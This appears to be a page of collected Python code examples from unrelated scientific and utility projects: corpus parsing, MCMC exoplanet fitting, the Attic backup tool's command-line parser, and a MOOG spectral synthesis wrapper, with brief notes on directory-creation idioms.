                filelist = unparsed_corpus_path.replace('.txt', '-filelist.txt')
                with open(filelist, 'w') as fo:
                    fo.write(unparsed_corpus_path + '\n')

            # split up filelists
            if multiprocess is not False:

                if multiprocess is True:
                    import multiprocessing
                    multiprocess = multiprocessing.cpu_count()
                from joblib import Parallel, delayed
                # split old file into n parts
                data, enc = saferead(filelist)
                fs = [i for i in data.splitlines() if i]
                # if there's nothing here, we're done
                if not fs:
                    # double dutch
                    REPEAT_PARSE_ATTEMPTS = 0
                    break
                if len(fs) <= multiprocess:
                    multiprocess = len(fs)
                # make generator with list of lists
                divl = int(len(fs) / multiprocess)
                filelists = []
                if not divl:
                    filelists.append(filelist)
                else:
                    fgen = chunks(fs, divl)
                
                    # for each list, make new file
                    for index, flist in enumerate(fgen):
                        as_str = '\n'.join(flist) + '\n'
                        new_fpath = filelist.replace('.txt', '-%s.txt' % str(index).zfill(4))
                        filelists.append(new_fpath)
                        with codecs.open(new_fpath, 'w', encoding='utf-8') as fo:
                            fo.write(as_str.encode('utf-8'))
                    try:
                        os.remove(filelist)
                    except:
                        pass

                ds = []
                for listpath in filelists:
                    d = {'proj_path': project_path, 
                         'corpuspath': to_parse,
                         'filelist': listpath,
                         'corenlppath': corenlppath,
                         'nltk_data_path': nltk_data_path,
                         'operations': operations,
                         'copula_head': cop_head,
                         'multiprocessing': True,
                         'root': root,
                         'note': note,
                         'stdout': stdout,
                         'outname': outname,
                         'coref': coref,
                         'output_format': kwargs.get('output_format', 'xml')
                        }
                    ds.append(d)

                res = Parallel(n_jobs=multiprocess)(delayed(parse_corpus)(**x) for x in ds)
                if len(res) > 0:
                    newparsed = res[0]
                else:
                    return
                if all(r is False for r in res):
                    return

                for i in filelists:
                    try:
                        os.remove(i)
                    except:
                        pass

            else:
                newparsed = parse_corpus(proj_path=project_path, 
                                         corpuspath=to_parse,
                                         filelist=filelist,
                                         corenlppath=corenlppath,
                                         nltk_data_path=nltk_data_path,
                                         operations=operations,
                                         copula_head=cop_head,
                                         root=root,
                                         note=note,
                                         stdout=stdout,
                                         fileparse=fileparse,
                                         outname=outname,
                                         output_format=kwargs.get('output_format', 'conll'))

            if not restart:
                REPEAT_PARSE_ATTEMPTS = 0
            else:
                REPEAT_PARSE_ATTEMPTS -= 1
                print('Repeating parsing due to missing files. '\
                      '%d iterations remaining.' % REPEAT_PARSE_ATTEMPTS)

        if parse and not newparsed:
            return 
        if parse and all(not x for x in newparsed):
            return

        if parse and fileparse:
            # cleanup mistakes :)
            if isfile(splitext(unparsed_corpus_path)[0]):
                os.remove(splitext(unparsed_corpus_path)[0])
            if isfile(unparsed_corpus_path.replace('.txt', '-filelist.txt')):
                os.remove(unparsed_corpus_path.replace('.txt', '-filelist.txt'))
            return unparsed_corpus_path + '.conll'

        if parse:
            move_parsed_files(project_path, to_parse, newparsed,
                          ext=kwargs.get('output_format', 'conll'), restart=restart)

            from corpkit.conll import convert_json_to_conll
            coref = False
            if operations is False:
                coref = True
            elif 'coref' in operations or 'dcoref' in operations:
               coref = True

            convert_json_to_conll(newparsed, speaker_segmentation=speaker_segmentation,
                                  coref=coref, metadata=metadata)

        try:
            os.remove(filelist)
        except:
            pass

    if not parse and tokenise:
        #todo: outname
        newparsed = to_parse.replace('-stripped', '-tokenised')
        from corpkit.tokenise import plaintext_to_conll
        newparsed = plaintext_to_conll(to_parse,
                                    postag=postag,
                                    lemmatise=lemmatise,
                                    lang=lang,
                                    metadata=metadata,
                                    nltk_data_path=nltk_data_path,
                                    speaker_segmentation=speaker_segmentation,
                                    outpath=newparsed)

        if outname:
            if not os.path.isdir(outname):
                outname = os.path.join('data', os.path.basename(outname))
            import shutil
            shutil.copytree(newparsed, outname)
            newparsed = outname
        if newparsed is False:
            return
        else:
            make_dotfile(newparsed)
            return newparsed

    rename_all_files(newparsed)

    print('Done!\n')
    make_dotfile(newparsed)
    return newparsed
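
Early in make_corpus the corpus is copied into the project's data directory only if the destination does not already exist (the "if exists(newp): pass / else: copier(...)" block above). A compact sketch of that guard, assuming a plain single-file copy rather than corpkit's file-or-tree copier:

import os
import shutil
from os.path import basename, exists, join

def copy_into_project(src, project_path):
    datapath = join(project_path, "data")
    os.makedirs(datapath, exist_ok=True)
    dest = join(datapath, basename(src))
    # Skip the copy if an earlier run already placed the corpus here.
    if not exists(dest):
        shutil.copy(src, dest)
    return dest

# e.g. copy_into_project("my_corpus.txt", "/tmp/myproject")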

Example 137

Project: VIP
Source File: mcmc_sampling.py
View license
def mcmc_negfc_sampling(cubes, angs, psfn, ncomp, plsc, initial_state,
                        fwhm=4, annulus_width=3, aperture_radius=4, cube_ref=None, 
                        svd_mode='lapack', scaling='temp-mean', fmerit='sum',
                        collapse='median', nwalkers=1000, bounds=None, a=2.0,
                        burnin=0.3, rhat_threshold=1.01, rhat_count_threshold=1,
                        niteration_min=0, niteration_limit=1e02, 
                        niteration_supp=0, check_maxgap=1e04, nproc=1, 
                        output_file=None, display=False, verbose=True, save=False):
    """ Runs an affine invariant mcmc sampling algorithm in order to determine
    the position and the flux of the planet using the 'Negative Fake Companion'
    technique. The result of this procedure is a chain with the samples from the
    posterior distributions of each of the 3 parameters.
    
    This technique can be summarized as follows:
    
    1)  We inject a negative fake companion (one candidate) at a given 
        position and characterized by a given flux, both close to the expected 
        values.
    2)  We run PCA on a full annulus which passes through the initial guess,
        regardless of the position of the candidate.
    3)  We extract the intensity values of all the pixels contained in a 
        circular aperture centered on the initial guess.
    4)  We calculate the function of merit. The associated chi^2 is given by
        chi^2 = sum(|I_j|) where j \in {1,...,N} with N the total number of 
        pixels contained in the circular aperture.        
    The steps 1) to 4) are looped. At each iteration, the candidate model 
    parameters are defined by the emcee Affine Invariant algorithm. 
    
    Parameters
    ----------  
    cubes: str or numpy.array
        The relative path to the cube of fits images OR the cube itself.
    angs: str or numpy.array
        The relative path to the parallactic angles fits image, or the angles array itself.
    psfn: str or numpy.array
        The relative path to the instrumental PSF fits image or the PSF itself.
        The PSF must be centered and the flux in a 1*FWHM aperture must equal 1.
    ncomp: int
        The number of principal components.        
    plsc: float
        The platescale, in arcsec per pixel.  
    annulus_width: float, optional
        The width in pixel of the annulus on which the PCA is performed.
    aperture_radius: float, optional
        The radius of the circular aperture.        
    nwalkers: int, optional
        The number of Goodman & Weare 'walkers'.
    initial_state: numpy.array
        The first guess for the position and flux of the planet, respectively.
        Each walker will start in a small ball around this preferred position.
    cube_ref : array_like, 3d, optional
        Reference library cube. For Reference Star Differential Imaging.
    svd_mode : {'lapack', 'randsvd', 'eigen', 'arpack'}, str optional
        Switch for different ways of computing the SVD and selected PCs.
        'randsvd' is not recommended for the negative fake companion technique.
    scaling : {'temp-mean', 'temp-standard'} or None, optional
        With None, no scaling is performed on the input data before SVD. With 
        "temp-mean" then temporal px-wise mean subtraction is done and with 
        "temp-standard" temporal mean centering plus scaling to unit variance 
        is done. 
    fmerit : {'sum', 'stddev'}, string optional
        Chooses the figure of merit to be used. stddev works better for close-in
        companions sitting on top of speckle noise.
    collapse : {'median', 'mean', 'sum', 'trimmean', None}, str or None, optional
        Sets the way of collapsing the frames for producing a final image. If
        None then the cube of residuals is used when measuring the function of
        merit (instead of a single final frame).
    bounds: numpy.array or list, default=None, optional
        The prior knowledge on the model parameters. If None, large bounds will 
        be automatically estimated from the initial state.
    a: float, default=2.0
        The proposal scale parameter. See notes.
    burnin: float, default=0.3
        The fraction of each walker's chain that is discarded as burn-in.
    rhat_threshold: float, default=1.01
        The Gelman-Rubin threshold used for the test for nonconvergence.   
    rhat_count_threshold: int, optional
        The Gelman-Rubin test must be satisfied 'rhat_count_threshold' times in
        a row before claiming that the chain has converged.        
    niteration_min: int, optional
        Steps per walker lower bound. The simulation will run at least this
        number of steps per walker.
    niteration_limit: int, optional
        Steps per walker upper bound. If the simulation runs up to 
        'niteration_limit' steps without having reached the convergence 
        criterion, the run is stopped.
    niteration_supp: int, optional
        Number of iterations to run after having "reached the convergence".     
    check_maxgap: int, optional
        Maximum number of steps per walker between two Gelman-Rubin tests.
    nproc: int, optional
        The number of processes to use for parallelization. 
    output_file: str
        The name of the output file which contains the MCMC results
        (if save is True).
    display: boolean
        If True, the walk plot is displayed at each evaluation of the Gelman-
        Rubin test.
    verbose: boolean
        Display information in the shell.
    save: boolean
        If True, the MCMC results are pickled.
                    
    Returns
    -------
    out : numpy.array
        The MCMC chain.         
        
    Notes
    -----
    The parameter 'a' must be > 1. For more theoretical information concerning
    this parameter, see Goodman & Weare, 2010, Comm. App. Math. Comp. Sci., 
    5, 65, Eq. [9] p70.
    
    The parameter 'rhat_threshold' can be a numpy.array with individual 
    threshold value for each model parameter.
    """ 
    if verbose:
        start_time = timeInit()
        print "        MCMC sampler for the NEGFC technique       "
        print sep

    # If required, create the output folder.
    if save:    
        if not os.path.exists('results'):
            os.makedirs('results')
        
        if output_file is None:
            datetime_today = datetime.datetime.today()
            output_file = str(datetime_today.year)+str(datetime_today.month)+\
                          str(datetime_today.day)+'_'+str(datetime_today.hour)+\
                          str(datetime_today.minute)+str(datetime_today.second)            
        
        if not os.path.exists('results/'+output_file):
            os.makedirs('results/'+output_file)

            
    # #########################################################################
    # If required, open the source files
    # #########################################################################
    if isinstance(cubes,str) and isinstance(angs,str):
        if angs is None:
            cubes, angs = open_adicube(cubes, verbose=False)
        else:
            cubes = open_fits(cubes)
            angs = open_fits(angs, verbose=False)    
        
        if isinstance(psfn,str):
            psfn = open_fits(psfn)
        
        if verbose:
            print "The data has been loaded. Let's continue!"
    
    # #########################################################################
    # Initialization of the variables
    # #########################################################################    
    dim = 3 # There are 3 model parameters, resp. the radial and angular 
            # position of the planet and its flux.
    
    itermin = niteration_min
    limit = niteration_limit    
    supp = niteration_supp
    maxgap = check_maxgap
    initial_state = np.array(initial_state)
    
    if itermin > limit:
        itermin = 0
        print("'niteration_min' must be < 'niteration_limit'.")
        
    fraction = 0.3
    geom = 0
    lastcheck = 0
    konvergence = np.inf
    rhat_count = 0
        
    chain = np.empty([nwalkers,1,dim])
    isamples = np.empty(0)
    pos = initial_state + np.random.normal(0,1e-01,(nwalkers,3))
    nIterations = limit + supp
    rhat = np.zeros(dim)  
    stop = np.inf
    

    if bounds is None:
        bounds = [(initial_state[0]-annulus_width/2.,initial_state[0]+annulus_width/2.), #radius
                  (initial_state[1]-10,initial_state[1]+10), #angle
                  (0,2*initial_state[2])] #flux
    
    sampler = emcee.EnsembleSampler(nwalkers,dim,lnprob,a,
                                    args =([bounds, cubes, angs, plsc, psfn,
                                            fwhm, annulus_width, ncomp,
                                            aperture_radius, initial_state,
                                            cube_ref, svd_mode, scaling, fmerit,
                                            collapse]),
                                    threads=nproc)
    
    duration_start = datetime.datetime.now()
    start = datetime.datetime.now()

    # #########################################################################
    # Affine Invariant MCMC run
    # ######################################################################### 
    if verbose:
        print ''
        print 'Start of the MCMC run ...'
        print 'Step  |  Duration/step (sec)  |  Remaining Estimated Time (sec)'
                             
    for k, res in enumerate(sampler.sample(pos,iterations=nIterations,
                                           storechain=True)):
        elapsed = (datetime.datetime.now()-start).total_seconds()
        if verbose:
            if k == 0:
                q = 0.5
            else:
                q = 1
            print '{}\t\t{:.5f}\t\t\t{:.5f}'.format(k,elapsed*q,elapsed*(limit-k-1)*q)
            
        start = datetime.datetime.now()

        # ---------------------------------------------------------------------        
        # Store the state manually in order to handle the dynamically sized chain.
        # ---------------------------------------------------------------------    
        ## Check if the size of the chain is long enough.
        s = chain.shape[1]
        if k+1 > s: # if not, double the chain length
            empty = np.zeros([nwalkers,2*s,dim])
            chain = np.concatenate((chain,empty),axis=1)
        ## Store the state of the chain
        chain[:,k] = res[0]
        
        
        # ---------------------------------------------------------------------
        # If k meets the criterion, test for non-convergence.
        # ---------------------------------------------------------------------              
        criterion = np.amin([ceil(itermin*(1+fraction)**geom),\
                            lastcheck+floor(maxgap)])
   
        if k == criterion:
            if verbose:
                print ''
                print '   Gelman-Rubin statistic test in progress ...' 
            
            geom += 1
            lastcheck = k
            if display:
                showWalk(chain)
                
            if save:
                import pickle                                    
                
                with open('results/'+output_file+'/'+output_file+'_temp_k{}'.format(k),'wb') as fileSave:
                    myPickler = pickle.Pickler(fileSave)
                    myPickler.dump({'chain':sampler.chain, 
                                    'lnprob':sampler.lnprobability, 
                                    'AR':sampler.acceptance_fraction})
                
            ## We only test the rhat if we have reached the minimum number of steps.
            if (k+1) >= itermin and konvergence == np.inf:
                threshold0 = int(floor(burnin*k))
                threshold1 = int(floor((1-burnin)*k*0.25))

                # We calculate the rhat for each model parameter.
                for j in range(dim):
                    part1 = chain[:,threshold0:threshold0+threshold1,j].reshape((-1))
                    part2 = chain[:,threshold0+3*threshold1:threshold0+4*threshold1,j].reshape((-1))
                    series = np.vstack((part1,part2))
                    rhat[j] = gelman_rubin(series)   
                if verbose:    
                    print '   r_hat = {}'.format(rhat)
                    print '   r_hat <= threshold = {}'.format(rhat <= rhat_threshold)
                    print ''
                # We test the rhat.
                if (rhat <= rhat_threshold).all(): #and rhat_count < rhat_count_threshold: 
                    rhat_count += 1
                    if rhat_count < rhat_count_threshold:
                        print("Gelman-Rubin test OK {}/{}".format(rhat_count,rhat_count_threshold))
                    elif rhat_count >= rhat_count_threshold:
                        print '... ==> convergence reached'
                        konvergence = k
                        stop = konvergence + supp                       
                #elif (rhat <= rhat_threshold).all() and rhat_count >= rhat_count_threshold:
                #    print '... ==> convergence reached'
                #    konvergence = k
                #    stop = konvergence + supp
                else:
                    rhat_count = 0

        if (k+1) >= stop: #Then we have reached the maximum number of steps for our Markov chain.
            print 'We break the loop because we have reached convergence'
            break
      
    if k == nIterations-1:
        print("We have reached the limit number of steps without having converged")
            
    # #########################################################################
    # Construction of the independent samples
    # ######################################################################### 
            
    temp = np.where(chain[0,:,0] == 0.0)[0]
    if len(temp) != 0:
        idxzero = temp[0]
    else:
        idxzero = chain.shape[1]
    
    idx = np.amin([np.floor(2e05/nwalkers),np.floor(0.1*idxzero)])
    if idx == 0:
        isamples = chain[:,0:idxzero,:] 
    else:
        isamples = chain[:,idxzero-idx:idxzero,:]

    if save:
        import pickle
        
        frame = inspect.currentframe()
        args, _, _, values = inspect.getargvalues(frame)
        input_parameters = {j : values[j] for j in args[1:]}        
        
        output = {'isamples':isamples,
                  'chain': chain_zero_truncated(chain),
                  'input_parameters': input_parameters,
                  'AR': sampler.acceptance_fraction,
                  'lnprobability': sampler.lnprobability}
                  
        with open('results/'+output_file+'/MCMC_results','wb') as fileSave:
            myPickler = pickle.Pickler(fileSave)
            myPickler.dump(output)
        
        print ''        
        print("The file MCMC_results has been stored in the folder {}".format('results/'+output_file+'/'))

    if verbose:
        timing(start_time)
                                    
    return chain_zero_truncated(chain)    
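
The save branch at the top of mcmc_negfc_sampling shows the usual exists-then-makedirs idiom for a timestamped results folder. A condensed, hypothetical helper along the same lines (ensure_results_dir and its arguments are illustrative; note the check-then-create sequence is not race-free):

import os
import datetime

def ensure_results_dir(output_file=None, root='results'):
    # Default to a timestamp, roughly as the function above does.
    if output_file is None:
        output_file = datetime.datetime.today().strftime('%Y%m%d_%H%M%S')
    path = os.path.join(root, output_file)
    # Guard os.makedirs with os.path.exists; on Python 3 one could instead
    # call os.makedirs(path, exist_ok=True) to avoid the race window.
    if not os.path.exists(path):
        os.makedirs(path)
    return path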

Example 138

Project: attic
Source File: archiver.py
View license
    def run(self, args=None):
        check_extension_modules()
        keys_dir = get_keys_dir()
        if not os.path.exists(keys_dir):
            os.makedirs(keys_dir)
            os.chmod(keys_dir, stat.S_IRWXU)
        cache_dir = get_cache_dir()
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
            os.chmod(cache_dir, stat.S_IRWXU)
            with open(os.path.join(cache_dir, 'CACHEDIR.TAG'), 'w') as fd:
                fd.write(textwrap.dedent("""
                    Signature: 8a477f597d28d172789f06886806bc55
                    # This file is a cache directory tag created by Attic.
                    # For information about cache directory tags, see:
                    #       http://www.brynosaurus.com/cachedir/
                    """).lstrip())
        common_parser = argparse.ArgumentParser(add_help=False)
        common_parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
                            default=False,
                            help='verbose output')

        # We can't use argparse for "serve" since we don't want it to show up in "Available commands"
        if args:
            args = self.preprocess_args(args)

        parser = argparse.ArgumentParser(description='Attic %s - Deduplicated Backups' % __version__)
        subparsers = parser.add_subparsers(title='Available commands')

        subparser = subparsers.add_parser('serve', parents=[common_parser],
                                          description=self.do_serve.__doc__)
        subparser.set_defaults(func=self.do_serve)
        subparser.add_argument('--restrict-to-path', dest='restrict_to_paths', action='append',
                               metavar='PATH', help='restrict repository access to PATH')
        init_epilog = textwrap.dedent("""
        This command initializes an empty repository. A repository is a filesystem
        directory containing the deduplicated data from zero or more archives.
        Encryption can be enabled at repository init time.
        """)
        subparser = subparsers.add_parser('init', parents=[common_parser],
                                          description=self.do_init.__doc__, epilog=init_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_init)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to create')
        subparser.add_argument('-e', '--encryption', dest='encryption',
                               choices=('none', 'passphrase', 'keyfile'), default='none',
                               help='select encryption method')

        check_epilog = textwrap.dedent("""
        The check command verifies the consistency of a repository and the corresponding
        archives. The underlying repository data files are first checked to detect bit rot
        and other types of damage. After that the consistency and correctness of the archive
        metadata is verified.

        The archive metadata checks can be time consuming and require access to the key
        file and/or passphrase if encryption is enabled. These checks can be skipped using
        the --repository-only option.
        """)
        subparser = subparsers.add_parser('check', parents=[common_parser],
                                          description=self.do_check.__doc__,
                                          epilog=check_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_check)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to check consistency of')
        subparser.add_argument('--repository-only', dest='repo_only', action='store_true',
                               default=False,
                               help='only perform repository checks')
        subparser.add_argument('--archives-only', dest='archives_only', action='store_true',
                               default=False,
                               help='only perform archives checks')
        subparser.add_argument('--repair', dest='repair', action='store_true',
                               default=False,
                               help='attempt to repair any inconsistencies found')

        change_passphrase_epilog = textwrap.dedent("""
        The key files used for repository encryption are optionally passphrase
        protected. This command can be used to change this passphrase.
        """)
        subparser = subparsers.add_parser('change-passphrase', parents=[common_parser],
                                          description=self.do_change_passphrase.__doc__,
                                          epilog=change_passphrase_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_change_passphrase)
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False))

        create_epilog = textwrap.dedent("""
        This command creates a backup archive containing all files found while recursively
        traversing all paths specified. The archive will consume almost no disk space for
        files or parts of files that have already been stored in other archives.

        See "attic help patterns" for more help on exclude patterns.
        """)

        subparser = subparsers.add_parser('create', parents=[common_parser],
                                          description=self.do_create.__doc__,
                                          epilog=create_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_create)
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the created archive')
        subparser.add_argument('-e', '--exclude', dest='excludes',
                               type=ExcludePattern, action='append',
                               metavar="PATTERN", help='exclude paths matching PATTERN')
        subparser.add_argument('--exclude-from', dest='exclude_files',
                               type=argparse.FileType('r'), action='append',
                               metavar='EXCLUDEFILE', help='read exclude patterns from EXCLUDEFILE, one per line')
        subparser.add_argument('--exclude-caches', dest='exclude_caches',
                               action='store_true', default=False,
                               help='exclude directories that contain a CACHEDIR.TAG file (http://www.brynosaurus.com/cachedir/spec.html)')
        subparser.add_argument('-c', '--checkpoint-interval', dest='checkpoint_interval',
                               type=int, default=300, metavar='SECONDS',
                               help='write checkpoint every SECONDS seconds (Default: 300)')
        subparser.add_argument('--do-not-cross-mountpoints', dest='dontcross',
                               action='store_true', default=False,
                               help='do not cross mount points')
        subparser.add_argument('--numeric-owner', dest='numeric_owner',
                               action='store_true', default=False,
                               help='only store numeric user and group identifiers')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to create')
        subparser.add_argument('paths', metavar='PATH', nargs='+', type=str,
                               help='paths to archive')

        extract_epilog = textwrap.dedent("""
        This command extracts the contents of an archive. By default the entire
        archive is extracted but a subset of files and directories can be selected
        by passing a list of ``PATHs`` as arguments. The file selection can further
        be restricted by using the ``--exclude`` option.

        See "attic help patterns" for more help on exclude patterns.
        """)
        subparser = subparsers.add_parser('extract', parents=[common_parser],
                                          description=self.do_extract.__doc__,
                                          epilog=extract_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_extract)
        subparser.add_argument('-n', '--dry-run', dest='dry_run',
                               default=False, action='store_true',
                               help='do not actually change any files')
        subparser.add_argument('-e', '--exclude', dest='excludes',
                               type=ExcludePattern, action='append',
                               metavar="PATTERN", help='exclude paths matching PATTERN')
        subparser.add_argument('--exclude-from', dest='exclude_files',
                               type=argparse.FileType('r'), action='append',
                               metavar='EXCLUDEFILE', help='read exclude patterns from EXCLUDEFILE, one per line')
        subparser.add_argument('--numeric-owner', dest='numeric_owner',
                               action='store_true', default=False,
                               help='only obey numeric user and group identifiers')
        subparser.add_argument('--strip-components', dest='strip_components',
                               type=int, default=0, metavar='NUMBER',
                               help='Remove the specified number of leading path elements. Pathnames with fewer elements will be silently skipped.')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to extract')
        subparser.add_argument('paths', metavar='PATH', nargs='*', type=str,
                               help='paths to extract')

        delete_epilog = textwrap.dedent("""
        This command deletes an archive from the repository. Any disk space not
        shared with any other existing archive is also reclaimed.
        """)
        subparser = subparsers.add_parser('delete', parents=[common_parser],
                                          description=self.do_delete.__doc__,
                                          epilog=delete_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_delete)
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the deleted archive')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to delete')

        list_epilog = textwrap.dedent("""
        This command lists the contents of a repository or an archive.
        """)
        subparser = subparsers.add_parser('list', parents=[common_parser],
                                          description=self.do_list.__doc__,
                                          epilog=list_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_list)
        subparser.add_argument('src', metavar='REPOSITORY_OR_ARCHIVE', type=location_validator(),
                               help='repository/archive to list contents of')
        mount_epilog = textwrap.dedent("""
        This command mounts an archive as a FUSE filesystem. This can be useful for
        browsing an archive or restoring individual files. Unless the ``--foreground``
        option is given the command will run in the background until the filesystem
        is unmounted.
        """)
        subparser = subparsers.add_parser('mount', parents=[common_parser],
                                          description=self.do_mount.__doc__,
                                          epilog=mount_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_mount)
        subparser.add_argument('src', metavar='REPOSITORY_OR_ARCHIVE', type=location_validator(),
                               help='repository/archive to mount')
        subparser.add_argument('mountpoint', metavar='MOUNTPOINT', type=str,
                               help='where to mount filesystem')
        subparser.add_argument('-f', '--foreground', dest='foreground',
                               action='store_true', default=False,
                               help='stay in foreground, do not daemonize')
        subparser.add_argument('-o', dest='options', type=str,
                               help='Extra mount options')

        info_epilog = textwrap.dedent("""
        This command displays some detailed information about the specified archive.
        """)
        subparser = subparsers.add_parser('info', parents=[common_parser],
                                          description=self.do_info.__doc__,
                                          epilog=info_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_info)
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to display information about')

        prune_epilog = textwrap.dedent("""
        The prune command prunes a repository by deleting archives not matching
        any of the specified retention options. This command is normally used by
        automated backup scripts wanting to keep a certain number of historic backups.

        As an example, "-d 7" means to keep the latest backup on each day for 7 days.
        Days without backups do not count towards the total.
        The rules are applied from hourly to yearly, and backups selected by previous
        rules do not count towards those of later rules. The time that each backup
        completes is used for pruning purposes. Dates and times are interpreted in
        the local timezone, and weeks go from Monday to Sunday. Specifying a
        negative number of archives to keep means that there is no limit.

        The "--keep-within" option takes an argument of the form "<int><char>",
        where char is "H", "d", "w", "m", "y". For example, "--keep-within 2d" means
        to keep all archives that were created within the past 48 hours.
        "1m" is taken to mean "31d". The archives kept with this option do not
        count towards the totals specified by any other options.

        If a prefix is set with -p, then only archives that start with the prefix are
        considered for deletion and only those archives count towards the totals
        specified by the rules.
        """)
        subparser = subparsers.add_parser('prune', parents=[common_parser],
                                          description=self.do_prune.__doc__,
                                          epilog=prune_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_prune)
        subparser.add_argument('-n', '--dry-run', dest='dry_run',
                               default=False, action='store_true',
                               help='do not change repository')
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the deleted archive')
        subparser.add_argument('--keep-within', dest='within', type=str, metavar='WITHIN',
                               help='keep all archives within this time interval')
        subparser.add_argument('-H', '--keep-hourly', dest='hourly', type=int, default=0,
                               help='number of hourly archives to keep')
        subparser.add_argument('-d', '--keep-daily', dest='daily', type=int, default=0,
                               help='number of daily archives to keep')
        subparser.add_argument('-w', '--keep-weekly', dest='weekly', type=int, default=0,
                               help='number of weekly archives to keep')
        subparser.add_argument('-m', '--keep-monthly', dest='monthly', type=int, default=0,
                               help='number of monthly archives to keep')
        subparser.add_argument('-y', '--keep-yearly', dest='yearly', type=int, default=0,
                               help='number of yearly archives to keep')
        subparser.add_argument('-p', '--prefix', dest='prefix', type=str,
                               help='only consider archive names starting with this prefix')
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to prune')

        subparser = subparsers.add_parser('help', parents=[common_parser],
                                          description='Extra help')
        subparser.add_argument('--epilog-only', dest='epilog_only',
                               action='store_true', default=False)
        subparser.add_argument('--usage-only', dest='usage_only',
                               action='store_true', default=False)
        subparser.set_defaults(func=functools.partial(self.do_help, parser, subparsers.choices))
        subparser.add_argument('topic', metavar='TOPIC', type=str, nargs='?',
                               help='additional help on TOPIC')

        args = parser.parse_args(args or ['-h'])
        self.verbose = args.verbose
        update_excludes(args)
        return args.func(args)
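
The first lines of run() above bootstrap the keys and cache directories: os.path.exists guards os.makedirs, the directory is restricted to the owner, and a CACHEDIR.TAG file is written on first use. A small, self-contained variant of that idiom (ensure_private_dir and tag_cache_dir are made-up names for illustration):

import os
import stat
import textwrap

def ensure_private_dir(path, tag_cache_dir=False):
    # Only create (and restrict) the directory on first use.
    if not os.path.exists(path):
        os.makedirs(path)
        os.chmod(path, stat.S_IRWXU)  # 0700: owner-only access
        if tag_cache_dir:
            # Mark cache directories so backup tools can skip them.
            with open(os.path.join(path, 'CACHEDIR.TAG'), 'w') as fd:
                fd.write(textwrap.dedent("""\
                    Signature: 8a477f597d28d172789f06886806bc55
                    # This file marks a cache directory.
                    """))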

Example 139

Project: apogee
Source File: moog.py
View license
def moogsynth(*args,**kwargs):
    """
    NAME:
       moogsynth
    PURPOSE:
       Run a MOOG synthesis (direct interface to the MOOG code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves with the LSF and macroturbulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances (they don't all have to have the same length, missing ones are filled in with zeros):
          [Atomic number1,diff1_1,diff1_2,diff1_3,...,diff1_N]
          [Atomic number2,diff2_1,diff2_2,diff2_3,...,diff2_N]
          ...
          [Atomic numberM,diffM_1,diffM_2,diffM_3,...,diffM_N]
    SYNTHESIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'108.00116':'1.001','606.01212':'1.01'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000, 7.0000000) spectral synthesis limits, step, and width of calculation (see MOOG)
       doflux= (False) if True, calculate the continuum flux instead
    LINELIST KEYWORDS:
       linelist= (None) linelist to use; if this is None, the code looks for a weed-out version of the linelist appropriate for the given model atmosphere; otherwise can be set to the path of a linelist file or to the name of an APOGEE linelist
    ATMOSPHERE KEYWORDS:
       Either:
          (a) modelatm= (None) can be set to the filename of a model atmosphere (needs to end in .mod)
          (b) specify the stellar parameters for a grid point in model atm by
              - lib= ('kurucz_filled') spectral library
              - teff= (4500) grid-point Teff
              - logg= (2.5) grid-point logg
              - metals= (0.) grid-point metallicity
              - cm= (0.) grid-point carbon-enhancement
              - am= (0.) grid-point alpha-enhancement
              - dr= return the path corresponding to this data release
       vmicro= (2.) microturbulence (km/s) (only used if the MOOG-formatted atmosphere file doesn't already exist)
    OUTPUT:
       (wavelengths,spectra (nspec,nwave)) for synth driver
       (wavelengths,continuum spectrum (nwave)) for doflux driver
    HISTORY:
       2015-02-13 - Written - Bovy (IAS)
    """
    doflux= kwargs.pop('doflux',False)
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    width= kwargs.pop('width',_WIDTH_DEFAULT)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'1.01',
                   '606.01213':'90',
                   '606.01313':'180',
                   '607.01214':'1.01',
                   '607.01314':'90',
                   '607.01215':'273',
                   '608.01216':'1.01',
                   '608.01316':'90',
